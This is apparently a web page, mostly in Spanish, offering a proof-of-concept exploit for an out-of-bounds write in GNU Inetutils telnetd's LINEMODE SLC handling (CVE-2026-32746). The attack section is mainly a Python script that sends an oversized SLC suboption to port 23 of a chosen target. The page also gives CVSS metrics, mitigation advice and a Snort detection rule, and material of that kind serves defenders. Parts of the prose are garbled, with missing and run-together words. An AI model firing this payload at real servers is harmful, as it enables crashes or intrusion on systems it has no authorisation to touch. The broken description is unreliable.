
Proof-of-concept exploit for CVE-2026-32746, a critical remote code execution vulnerability in GNU Inetutils telnetd via LINEMODE SLC buffer overflow. Includes technical analysis, CVSS metrics, and mitigation guidance.
Vulnerabilidad Crítica | CVSS 9.8 | ¡Ejecución Remota de Código!
Afecta: GNU Inetutils Telnetd (versiones previas a 2.7)
Tipo: OOB Write en el manejador de subopciones LINEMODE SLC
Vector de Ataque: Red (Puerto 23) | Sin autenticación requerida
Impacto: RCE con privilegios del proceso Telnetd
Se ha identificado un desbordamiento de búfer por escritura fuera de límites (OOB Write) en la función add_slc del demonio de . Este fallo permite a un atacante remoto mediante la manipulación de las del protocolo Telnet.
telnetdadd_slc (procesamiento de caracteres locales).Un atacante puede explotar esta vulnerabilidad mediante un payload Telnet malicioso que satura el búfer interno:
#!/usr/bin/env python3
import socket
import sys
# CVE-2026-32746 - LINEMODE SLC Overflow
# IAC SB LINEMODE SLC <list> IAC SE
IAC = b'\xff'
SB = b'\xfa'
SE = b'\xf0'
LINEMODE = b'\x22'
SLC = b'\x03'
target = sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1"
# Payload generado para desbordar add_slc
malicious_slc = b"\x01\x03\x41" * 600 # Repetición de 600 veces
payload = IAC + SB + LINEMODE + SLC + malicious_slc + IAC + SE
print(f"[*] Enviando payload malicioso a {target}...")
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.connect((target, 23))
s.sendall(payload)
print("[+] Payload entregado. Verificando caída del servicio/RCE...")
⚠️ ¡ADVERTENCIA! Este código es solo para fines educativos y de investigación. Su uso en sistemas sin autorización es ilegal.
| Métrica | Valor | Descripción |
|---|---|---|
| Vector | AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H | Remoto, sin autenticación |
| Puntuación | 9.8 (CRÍTICO) 🔴 | Alto impacto en confidencialidad, integridad y disponibilidad |
| Publicación | 13 de marzo, 2026 | Última modificación: 5 de mayo, 2026 |
✅ Actualizar GNU Inetutils a la versión parcheada (post-2.7).
🔹 Deshabilitar telnetd y migrar a SSH (recomendado).
🔹 Bloquear el puerto 23 en firewalls perimetrales.
🔹 Configurar IDS/IPS para detectar secuencias LINEMODE SLC anómalas.
alert tcp any any -> any 23 (msg:"CVE-2026-32746 - LINEMODE SLC Overflow"; content:"|FF FA 22 03|"; depth:5; threshold:type both, track by_src, count 1, seconds 1; sid:1000001; rev:1;)